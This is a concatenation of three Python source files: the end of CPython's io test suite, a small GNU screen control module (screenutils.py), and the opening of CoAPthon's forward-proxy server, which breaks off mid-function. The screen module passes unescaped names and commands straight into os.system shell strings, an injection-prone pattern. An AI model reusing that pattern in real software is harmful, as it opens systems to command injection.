b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.read)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
class PyTextIOWrapperTest(TextIOWrapperTest):
pass
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
for enc in encodings:
decoder = enc and codecs.getincrementaldecoder(enc)()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding(decoder, enc)
decoder = codecs.getincrementaldecoder("utf-8")()
decoder = self.IncrementalNewlineDecoder(decoder, translate=True)
self.check_newline_decoding_utf8(decoder)
def test_newline_bytes(self):
# Issue 5433: Excessive optimization in IncrementalNewlineDecoder
def _check(dec):
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0D00"), "\u0D00")
self.assertEqual(dec.newlines, None)
self.assertEqual(dec.decode("\u0A00"), "\u0A00")
self.assertEqual(dec.newlines, None)
dec = self.IncrementalNewlineDecoder(None, translate=False)
_check(dec)
dec = self.IncrementalNewlineDecoder(None, translate=True)
_check(dec)
class CIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
class PyIncrementalNewlineDecoderTest(IncrementalNewlineDecoderTest):
pass
# XXX Tests for open()
class MiscIOTest(unittest.TestCase):
def tearDown(self):
support.unlink(support.TESTFN)
def test___all__(self):
for name in self.io.__all__:
obj = getattr(self.io, name, None)
self.assertTrue(obj is not None, name)
if name == "open":
continue
elif "error" in name.lower() or name == "UnsupportedOperation":
self.assertTrue(issubclass(obj, Exception), name)
elif not name.startswith("SEEK_"):
self.assertTrue(issubclass(obj, self.IOBase))
def test_attributes(self):
f = self.open(support.TESTFN, "wb", buffering=0)
self.assertEqual(f.mode, "wb")
f.close()
f = self.open(support.TESTFN, "U")
self.assertEqual(f.name, support.TESTFN)
self.assertEqual(f.buffer.name, support.TESTFN)
self.assertEqual(f.buffer.raw.name, support.TESTFN)
self.assertEqual(f.mode, "U")
self.assertEqual(f.buffer.mode, "rb")
self.assertEqual(f.buffer.raw.mode, "rb")
f.close()
f = self.open(support.TESTFN, "w+")
self.assertEqual(f.mode, "w+")
self.assertEqual(f.buffer.mode, "rb+") # Does it really matter?
self.assertEqual(f.buffer.raw.mode, "rb+")
g = self.open(f.fileno(), "wb", closefd=False)
self.assertEqual(g.mode, "wb")
self.assertEqual(g.raw.mode, "wb")
self.assertEqual(g.name, f.fileno())
self.assertEqual(g.raw.name, f.fileno())
f.close()
g.close()
def test_io_after_close(self):
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "w", "buffering": 1},
{"mode": "w", "buffering": 2},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "r", "buffering": 1},
{"mode": "r", "buffering": 2},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+", "buffering": 1},
{"mode": "w+", "buffering": 2},
{"mode": "w+b", "buffering": 0},
]:
f = self.open(support.TESTFN, **kwargs)
f.close()
self.assertRaises(ValueError, f.flush)
self.assertRaises(ValueError, f.fileno)
self.assertRaises(ValueError, f.isatty)
self.assertRaises(ValueError, f.__iter__)
if hasattr(f, "peek"):
self.assertRaises(ValueError, f.peek, 1)
self.assertRaises(ValueError, f.read)
if hasattr(f, "read1"):
self.assertRaises(ValueError, f.read1, 1024)
if hasattr(f, "readall"):
self.assertRaises(ValueError, f.readall)
if hasattr(f, "readinto"):
self.assertRaises(ValueError, f.readinto, bytearray(1024))
self.assertRaises(ValueError, f.readline)
self.assertRaises(ValueError, f.readlines)
self.assertRaises(ValueError, f.seek, 0)
self.assertRaises(ValueError, f.tell)
self.assertRaises(ValueError, f.truncate)
self.assertRaises(ValueError, f.write,
b"" if "b" in kwargs['mode'] else "")
self.assertRaises(ValueError, f.writelines, [])
self.assertRaises(ValueError, next, f)
def test_blockingioerror(self):
# Various BlockingIOError issues
self.assertRaises(TypeError, self.BlockingIOError)
self.assertRaises(TypeError, self.BlockingIOError, 1)
self.assertRaises(TypeError, self.BlockingIOError, 1, 2, 3, 4)
self.assertRaises(TypeError, self.BlockingIOError, 1, "", None)
b = self.BlockingIOError(1, "")
self.assertEqual(b.characters_written, 0)
class C(str):
pass
c = C("")
b = self.BlockingIOError(1, c)
c.b = b
b.c = c
wr = weakref.ref(c)
del c, b
support.gc_collect()
self.assertTrue(wr() is None, wr)
def test_abcs(self):
# Test the visible base classes are ABCs.
self.assertIsInstance(self.IOBase, abc.ABCMeta)
self.assertIsInstance(self.RawIOBase, abc.ABCMeta)
self.assertIsInstance(self.BufferedIOBase, abc.ABCMeta)
self.assertIsInstance(self.TextIOBase, abc.ABCMeta)
def _check_abc_inheritance(self, abcmodule):
with self.open(support.TESTFN, "wb", buffering=0) as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "wb") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertIsInstance(f, abcmodule.BufferedIOBase)
self.assertNotIsInstance(f, abcmodule.TextIOBase)
with self.open(support.TESTFN, "w") as f:
self.assertIsInstance(f, abcmodule.IOBase)
self.assertNotIsInstance(f, abcmodule.RawIOBase)
self.assertNotIsInstance(f, abcmodule.BufferedIOBase)
self.assertIsInstance(f, abcmodule.TextIOBase)
def test_abc_inheritance(self):
# Test implementations inherit from their respective ABCs
self._check_abc_inheritance(self)
def test_abc_inheritance_official(self):
# Test implementations inherit from the official ABCs of the
# baseline "io" module.
self._check_abc_inheritance(io)
def _check_warn_on_dealloc(self, *args, **kwargs):
f = open(*args, **kwargs)
r = repr(f)
with self.assertWarns(ResourceWarning) as cm:
f = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_warn_on_dealloc(self):
self._check_warn_on_dealloc(support.TESTFN, "wb", buffering=0)
self._check_warn_on_dealloc(support.TESTFN, "wb")
self._check_warn_on_dealloc(support.TESTFN, "w")
def _check_warn_on_dealloc_fd(self, *args, **kwargs):
fds = []
def cleanup_fds():
for fd in fds:
try:
os.close(fd)
except EnvironmentError as e:
if e.errno != errno.EBADF:
raise
self.addCleanup(cleanup_fds)
r, w = os.pipe()
fds += r, w
self._check_warn_on_dealloc(r, *args, **kwargs)
# When using closefd=False, there's no warning
r, w = os.pipe()
fds += r, w
with warnings.catch_warnings(record=True) as recorded:
open(r, *args, closefd=False, **kwargs)
support.gc_collect()
self.assertEqual(recorded, [])
def test_warn_on_dealloc_fd(self):
self._check_warn_on_dealloc_fd("rb", buffering=0)
self._check_warn_on_dealloc_fd("rb")
self._check_warn_on_dealloc_fd("r")
def test_pickling(self):
# Pickling file objects is forbidden
for kwargs in [
{"mode": "w"},
{"mode": "wb"},
{"mode": "wb", "buffering": 0},
{"mode": "r"},
{"mode": "rb"},
{"mode": "rb", "buffering": 0},
{"mode": "w+"},
{"mode": "w+b"},
{"mode": "w+b", "buffering": 0},
]:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
with self.open(support.TESTFN, **kwargs) as f:
self.assertRaises(TypeError, pickle.dumps, f, protocol)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_bigbuf(self):
self._test_nonblock_pipe_write(16*1024)
@unittest.skipUnless(fcntl, 'fcntl required for this test')
def test_nonblock_pipe_write_smallbuf(self):
self._test_nonblock_pipe_write(1024)
def _set_non_blocking(self, fd):
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
self.assertNotEqual(flags, -1)
res = fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
self.assertEqual(res, 0)
def _test_nonblock_pipe_write(self, bufsize):
sent = []
received = []
r, w = os.pipe()
self._set_non_blocking(r)
self._set_non_blocking(w)
# To exercise all code paths in the C implementation we need
# to play with buffer sizes. For instance, if we choose a
# buffer size less than or equal to _PIPE_BUF (4096 on Linux)
# then we will never get a partial write of the buffer.
rf = self.open(r, mode='rb', closefd=True, buffering=bufsize)
wf = self.open(w, mode='wb', closefd=True, buffering=bufsize)
with rf, wf:
for N in 9999, 73, 7574:
try:
i = 0
while True:
msg = bytes([i % 26 + 97]) * N
sent.append(msg)
wf.write(msg)
i += 1
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
sent[-1] = sent[-1][:e.characters_written]
received.append(rf.read())
msg = b'BLOCKED'
wf.write(msg)
sent.append(msg)
while True:
try:
wf.flush()
break
except self.BlockingIOError as e:
self.assertEqual(e.args[0], errno.EAGAIN)
self.assertEqual(e.characters_written, 0)
received.append(rf.read())
received += iter(rf.read, None)
sent, received = b''.join(sent), b''.join(received)
self.assertTrue(sent == received)
self.assertTrue(wf.closed)
self.assertTrue(rf.closed)
class CMiscIOTest(MiscIOTest):
io = io
class PyMiscIOTest(MiscIOTest):
io = pyio
@unittest.skipIf(os.name == 'nt', 'POSIX signals required for this test.')
class SignalsTest(unittest.TestCase):
def setUp(self):
self.oldalrm = signal.signal(signal.SIGALRM, self.alarm_interrupt)
def tearDown(self):
signal.signal(signal.SIGALRM, self.oldalrm)
def alarm_interrupt(self, sig, frame):
1/0
@unittest.skipUnless(threading, 'Threading required for this test.')
@unittest.skipIf(sys.platform in ('freebsd5', 'freebsd6', 'freebsd7'),
'issue #12429: skip test on FreeBSD <= 7')
def check_interrupted_write(self, item, bytes, **fdopen_kwargs):
"""Check that a partial write, when it gets interrupted, properly
invokes the signal handler, and bubbles up the exception raised
in the latter."""
# XXX This test has three flaws that appear when objects are
# XXX not reference counted.
# - if wio.write() happens to trigger a garbage collection,
# the signal exception may be raised when some __del__
# method is running; it will not reach the assertRaises()
# call.
# - more subtle, if the wio object is not destroyed at once
# and survives this function, the next opened file is likely
# to have the same fileno (since the file descriptor was
# actively closed). When wio.__del__ is finally called, it
# will close the other's test file... To trigger this with
# CPython, try adding "global wio" in this function.
# - This happens only for streams created by the _pyio module,
# because a wio.close() that fails still consider that the
# file needs to be closed again. You can try adding an
# "assert wio.closed" at the end of the function.
# Fortunately, a little gc.gollect() seems to be enough to
# work around all these issues.
support.gc_collect()
read_results = []
def _read():
s = os.read(r, 1)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
try:
wio = self.io.open(w, **fdopen_kwargs)
t.start()
signal.alarm(1)
# Fill the pipe enough that the write will be blocking.
# It will be interrupted by the timer armed above. Since the
# other thread has read one byte, the low-level write will
# return with a successful (partial) result rather than an EINTR.
# The buffered IO layer must check for pending signal
# handlers, which in this case will invoke alarm_interrupt().
self.assertRaises(ZeroDivisionError,
wio.write, item * (1024 * 1024))
t.join()
# We got one byte, get another one and check that it isn't a
# repeat of the first one.
read_results.append(os.read(r, 1))
self.assertEqual(read_results, [bytes[0:1], bytes[1:2]])
finally:
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and block again.
try:
wio.close()
except IOError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_unbuffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb", buffering=0)
def test_interrupted_write_buffered(self):
self.check_interrupted_write(b"xy", b"xy", mode="wb")
def test_interrupted_write_text(self):
self.check_interrupted_write("xy", b"xy", mode="w", encoding="ascii")
def check_reentrant_write(self, data, **fdopen_kwargs):
def on_alarm(*args):
# Will be called reentrantly from the same thread
wio.write(data)
1/0
signal.signal(signal.SIGALRM, on_alarm)
r, w = os.pipe()
wio = self.io.open(w, **fdopen_kwargs)
try:
signal.alarm(1)
# Either the reentrant call to wio.write() fails with RuntimeError,
# or the signal handler raises ZeroDivisionError.
with self.assertRaises((ZeroDivisionError, RuntimeError)) as cm:
while 1:
for i in range(100):
wio.write(data)
wio.flush()
# Make sure the buffer doesn't fill up and block further writes
os.read(r, len(data) * 100)
exc = cm.exception
if isinstance(exc, RuntimeError):
self.assertTrue(str(exc).startswith("reentrant call"), str(exc))
finally:
wio.close()
os.close(r)
def test_reentrant_write_buffered(self):
self.check_reentrant_write(b"xy", mode="wb")
def test_reentrant_write_text(self):
self.check_reentrant_write("xy", mode="w", encoding="ascii")
def check_interrupted_read_retry(self, decode, **fdopen_kwargs):
"""Check that a buffered read, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
def alarm_handler(sig, frame):
os.write(w, b"bar")
signal.signal(signal.SIGALRM, alarm_handler)
try:
rio = self.io.open(r, **fdopen_kwargs)
os.write(w, b"foo")
signal.alarm(1)
# Expected behaviour:
# - first raw read() returns partial b"foo"
# - second raw read() returns EINTR
# - third raw read() returns b"bar"
self.assertEqual(decode(rio.read(6)), "foobar")
finally:
rio.close()
os.close(w)
os.close(r)
def test_interrupted_read_retry_buffered(self):
self.check_interrupted_read_retry(lambda x: x.decode('latin1'),
mode="rb")
def test_interrupted_read_retry_text(self):
self.check_interrupted_read_retry(lambda x: x,
mode="r")
@unittest.skipUnless(threading, 'Threading required for this test.')
def check_interrupted_write_retry(self, item, **fdopen_kwargs):
"""Check that a buffered write, when it gets interrupted (either
returning a partial result or EINTR), properly invokes the signal
handler and retries if the latter returned successfully."""
select = support.import_module("select")
# A quantity that exceeds the buffer size of an anonymous pipe's
# write end.
N = 1024 * 1024
r, w = os.pipe()
fdopen_kwargs["closefd"] = False
# We need a separate thread to read from the pipe and allow the
# write() to finish. This thread is started after the SIGALRM is
# received (forcing a first EINTR in write()).
read_results = []
write_finished = False
def _read():
while not write_finished:
while r in select.select([r], [], [], 1.0)[0]:
s = os.read(r, 1024)
read_results.append(s)
t = threading.Thread(target=_read)
t.daemon = True
def alarm1(sig, frame):
signal.signal(signal.SIGALRM, alarm2)
signal.alarm(1)
def alarm2(sig, frame):
t.start()
signal.signal(signal.SIGALRM, alarm1)
try:
wio = self.io.open(w, **fdopen_kwargs)
signal.alarm(1)
# Expected behaviour:
# - first raw write() is partial (because of the limited pipe buffer
# and the first alarm)
# - second raw write() returns EINTR (because of the second alarm)
# - subsequent write()s are successful (either partial or complete)
self.assertEqual(N, wio.write(item * N))
wio.flush()
write_finished = True
t.join()
self.assertEqual(N, sum(len(x) for x in read_results))
finally:
write_finished = True
os.close(w)
os.close(r)
# This is deliberate. If we didn't close the file descriptor
# before closing wio, wio would try to flush its internal
# buffer, and could block (in case of failure).
try:
wio.close()
except IOError as e:
if e.errno != errno.EBADF:
raise
def test_interrupted_write_retry_buffered(self):
self.check_interrupted_write_retry(b"x", mode="wb")
def test_interrupted_write_retry_text(self):
self.check_interrupted_write_retry("x", mode="w", encoding="latin1")
class CSignalsTest(SignalsTest):
io = io
class PySignalsTest(SignalsTest):
io = pyio
# Handling reentrancy issues would slow down _pyio even more, so the
# tests are disabled.
test_reentrant_write_buffered = None
test_reentrant_write_text = None
def test_main():
tests = (CIOTest, PyIOTest,
CBufferedReaderTest, PyBufferedReaderTest,
CBufferedWriterTest, PyBufferedWriterTest,
CBufferedRWPairTest, PyBufferedRWPairTest,
CBufferedRandomTest, PyBufferedRandomTest,
StatefulIncrementalDecoderTest,
CIncrementalNewlineDecoderTest, PyIncrementalNewlineDecoderTest,
CTextIOWrapperTest, PyTextIOWrapperTest,
CMiscIOTest, PyMiscIOTest,
CSignalsTest, PySignalsTest,
)
# Put the namespaces of the IO module we are testing and some useful mock
# classes in the __dict__ of each test.
mocks = (MockRawIO, MisbehavedRawIO, MockFileIO, CloseFailureIO,
MockNonBlockWriterIO, MockUnseekableIO, MockRawIOWithoutRead)
all_members = io.__all__ + ["IncrementalNewlineDecoder"]
c_io_ns = {name : getattr(io, name) for name in all_members}
py_io_ns = {name : getattr(pyio, name) for name in all_members}
globs = globals()
c_io_ns.update((x.__name__, globs["C" + x.__name__]) for x in mocks)
py_io_ns.update((x.__name__, globs["Py" + x.__name__]) for x in mocks)
# Avoid turning open into a bound method.
py_io_ns["open"] = pyio.OpenWrapper
for test in tests:
if test.__name__.startswith("C"):
for name, obj in c_io_ns.items():
setattr(test, name, obj)
elif test.__name__.startswith("Py"):
for name, obj in py_io_ns.items():
setattr(test, name, obj)
support.run_unittest(*tests)
if __name__ == "__main__":
test_main()
|
screenutils.py
|
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Note: this may not work with bpython, use python 2.6 or upper
# Author: Christophe Narbonne
# Contrib: Alexis Metaireau
from subprocess import getoutput
from multiprocessing import Process
from os import system
from time import sleep
def list_screens():
"""List all the existing screens and build a Screen instance for each
"""
return [Screen(".".join(l.split(".")[1:]).split("\t")[0])
for l in getoutput("screen -ls | grep -P '\t'").split('\n')]
class ScreenNotFoundError(Exception):
"""raised when the screen does not exists"""
class Screen(object):
"""Represents a gnu-screen object::
>>> s=Screen("screenName", create=True)
>>> s.name
'screenName'
>>> s.exists
True
>>> s.state
>>> s.send_commands("man -k keyboard")
>>> s.kill()
>>> s.exists
False
"""
def __init__(self, name, create=False):
self.name = name
self._id = None
self._status = None
if create:
self.create()
@property
def id(self):
"""return the identifier of the screen"""
if not self._id:
self._set_screen_infos()
return self._id
@property
def status(self):
"""return the status of the screen"""
self._set_screen_infos()
return self._status
@property
def exists(self):
"""Tell if the screen session exists or not."""
# output line sample:
# " 28062.G.Terminal (Detached)"
lines = getoutput("screen -ls | grep " + self.name).split('\n')
return self.name in [".".join(l.split(".")[1:]).split("\t")[0]
for l in lines]
def create(self):
"""create a screen, if does not exists yet"""
if not self.exists:
Process(target=self._delayed_detach).start()
system('screen -UR ' + self.name)
def interrupt(self):
"""Insert CTRL+C in the screen session"""
self._check_exists()
system("screen -x " + self.name + " -X eval \"stuff \\003\"")
def kill(self):
"""Kill the screen applications then quit the screen"""
self._check_exists()
system('screen -x ' + self.name + ' -X quit')
def detach(self):
"""detach the screen"""
self._check_exists()
system("screen -d " + self.name)
def _delayed_detach(self):
sleep(5)
self.detach()
def send_commands(self, commands):
"""send commands to the active gnu-screen"""
self._check_exists()
for command in commands:
sleep(0.02)
print(command)
system('screen -x ' + self.name + ' -X stuff "' + command + '" ')
sleep(0.02)
system('screen -x ' + self.name + ' -X eval "stuff \\015" ')
def _check_exists(self, message="Error code: 404"):
"""check whereas the screen exist. if not, raise an exception"""
if not self.exists:
raise ScreenNotFoundError(message)
def _set_screen_infos(self):
"""set the screen information related parameters"""
if self.exists:
infos = getoutput("screen -ls | grep %s" % self.name).split('\t')[1:]
self._id = infos[0].split('.')[0]
self._date = infos[1][1:-1]
self._status = infos[2][1:-1]
def __repr__(self):
return "<%s '%s'>" % (self.__class__.__name__, self.name)
|
coap.py
|
import logging.config
import random
import socket
import struct
import threading
import os
from coapthon import defines
from coapthon.layers.blocklayer import BlockLayer
from coapthon.layers.cachelayer import CacheLayer
from coapthon.layers.forwardLayer import ForwardLayer
from coapthon.layers.messagelayer import MessageLayer
from coapthon.layers.observelayer import ObserveLayer
from coapthon.layers.resourcelayer import ResourceLayer
from coapthon.messages.message import Message
from coapthon.messages.request import Request
from coapthon.resources.resource import Resource
from coapthon.serializer import Serializer
from coapthon.utils import Tree, create_logging
__author__ = 'Giacomo Tanganelli'
if not os.path.isfile("logging.conf"):
create_logging()
logger = logging.getLogger(__name__)
logging.config.fileConfig("logging.conf", disable_existing_loggers=False)
class CoAP(object):
"""
Implementation of the Forward Proxy
"""
def __init__(self, server_address, multicast=False, starting_mid=None, cache=False, sock=None):
"""
Initialize the Forward Proxy.
:param server_address: Server address for incoming connections
:param multicast: if the ip is a multicast address
:param starting_mid: used for testing purposes
:param cache: if a cache must be used
:param sock: if a socket has been created externally, it can be used directly
"""
self.stopped = threading.Event()
self.stopped.clear()
self.to_be_stopped = []
self.purge = threading.Thread(target=self.purge)
self.purge.start()
self.cache_enable = cache
self._messageLayer = MessageLayer(starting_mid)
self._blockLayer = BlockLayer()
self._observeLayer = ObserveLayer()
if self.cache_enable:
self._cacheLayer = CacheLayer(defines.FORWARD_PROXY)
else:
self._cacheLayer = None
self._forwardLayer = ForwardLayer(self)
self.resourceLayer = ResourceLayer(self)
# Resource directory
root = Resource('root', self, visible=False, observable=False, allow_children=True)
root.path = '/'
self.root = Tree()
self.root["/"] = root
self._serializer = None
self.server_address = server_address
self.multicast = multicast
addrinfo = socket.getaddrinfo(self.server_address[0], None)[0]
if sock is not None:
# Use given socket, could be a DTLS socket
self._socket = sock
elif self.multicast: # pragma: no cover
# Create a socket
# self._socket.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_TTL, 255)
# self._socket.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_LOOP, 1)
# Join group
if addrinfo[0] == socket.AF_INET: # IPv4
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
# Allow multiple copies of this program on one machine
# (not strictly needed)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.bind((defines.ALL_COAP_NODES, self.server_address[1]))
mreq = struct.pack("4sl", socket.inet_aton(defines.ALL_COAP_NODES), socket.INADDR_ANY)
self._socket.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
self._unicast_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._unicast_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._unicast_socket.bind(self.server_address)
else:
self._socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
# Allow multiple copies of this program on one machine
# (not strictly needed)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.bind((defines.ALL_COAP_NODES_IPV6, self.server_address[1]))
addrinfo_multicast = socket.getaddrinfo(defines.ALL_COAP_NODES_IPV6, 5683)[0]
group_bin = socket.inet_pton(socket.AF_INET6, addrinfo_multicast[4][0])
mreq = group_bin + struct.pack('@I', 0)
self._socket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq)
self._unicast_socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
self._unicast_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._unicast_socket.bind(self.server_address)
else:
if addrinfo[0] == socket.AF_INET: # IPv4
self._socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
else:
self._socket = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
self._socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._socket.bind(self.server_address)
def purge(self):
"""
Clean old transactions
"""
while not self.stopped.isSet():
self.stopped.wait(timeout=defines.EXCHANGE_LIFETIME)
self._messageLayer.purge()
def listen(self, timeout=10):
"""
Listen for incoming messages. Timeout is used to check if the server must be switched off.
:param timeout: Socket Timeout in seconds
"""
self._socket.settimeout(float(timeout))
while not self.stopped.isSet():
try:
data, client_address = self._socket.recvfrom(4096)
except socket.timeout:
continue
try:
#Start a new thread not to block other requests
args = ((data, client_address), )
t = threading.Thread(target=self.receive_datagram, args=args)
t.daemon = True
t.start()
except RuntimeError:
print "Exception with Executor"
print "closing socket"
self._socket.close()
def close(self):
"""
Stop the server.
"""
logger.info("Stop server")
self.stopped.set()
for event in self.to_be_stopped:
event.set()
self._socket.close()
def receive_datagram(self, args):
"""
Handle messages coming from the udp socket.
:param args: (data, client_address)
"""
data, client_address = args
print "receiving datagram"
try:
host, port = client_address
except ValueError:
host, port, tmp1, tmp2 = client_address
client_address = (host, port)
serializer = Serializer()
message = serializer.deserialize(data, client_address)
if isinstance(message, int):
logger.error("receive_datagram - BAD REQUEST")
rst = Message()
rst.destination = client_address
rst.type = defines.Types["RST"]
rst.code = message
self.send_datagram(rst)
return
logger.debug("receive_datagram - " + str(message))
if isinstance(message, Request):
transaction = self._messageLayer.receive_request(message)
if transaction.request.duplicated and transaction.completed:
logger.debug("message duplicated,transaction completed")
transaction = self._observeLayer.send_response(transaction)
transaction = self._blockLayer.send_response(transaction)
transaction = self._messageLayer.send_response(transaction)
self.send_datagram(transaction.response)
return
elif transaction.request.duplicated and not transaction.completed:
logger.debug("message duplicated,transaction NOT completed")
self._send_ack(transaction)
return
transaction.separate_timer = self._start_separate_timer(transaction)
transaction = self._blockLayer.receive_request(transaction)
if transaction.block_transfer:
self._stop_separate_timer(transaction.separate_timer)
transaction = self._messageLayer.send_response(transaction)
self.send_datagram(transaction.response)
return
transaction = self._observeLayer.receive_request(transaction)
"""
call to the cache layer to check if there's a cached response for the request
if not, call the forward layer
"""
if self._cacheLayer is not None:
transaction = self._cacheLayer.receive_request(transaction)
if transaction.cacheHit is False:
print transaction.request
transaction = self._forwardLayer.receive_request(transaction)
print transaction.response
transaction = self._observeLayer.send_response(transaction)
transaction = self._blockLayer.send_response(transaction)
transaction = self._cacheLayer.send_response(transaction)
else:
transaction = self._forwardLayer.receive_request(transaction)
transaction = self._observeLayer.send_response(transaction)
transaction = self._blockLayer.send_response(transaction)
self._stop_separate_timer(transaction.separate_timer)
transaction = self._messageLayer.send_response(transaction)
if transaction.response is not None:
if transaction.response.type == defines.Types["CON"]:
self._start_retransmission(transaction, transaction.response)
self.send_datagram(transaction.response)
elif isinstance(message, Message):
transaction = self._messageLayer.receive_empty(message)
if transaction is not None:
transaction = self._blockLayer.receive_empty(message, transaction)
self._observeLayer.receive_empty(message, transaction)
else: # is Response
logger.error("Received response from %s", message.source)
def send_datagram(self, message):
"""
Send a message through the udp socket.
:type message: Message
:param message: the message to send
"""
if not self.stopped.isSet():
host, port = message.destination
logger.debug("send_datagram - " + str(message))
serializer = Serializer()
message = serializer.serialize(message)
self._socket.sendto(message, (host, port))
def _start_retransmission(self, transaction, message):
"""
Start the retransmission task.
:type transaction: Transaction
:param transaction: the transaction that owns the message that needs retransmission
:type message: Message
:param message: the message that needs the retransmission task
"""
with transaction:
if message.type == defines.Types['CON']:
future_time = random.uniform(defines.ACK_TIMEOUT, (defines.ACK_TIMEOUT * defines.ACK_RANDOM_FACTOR))
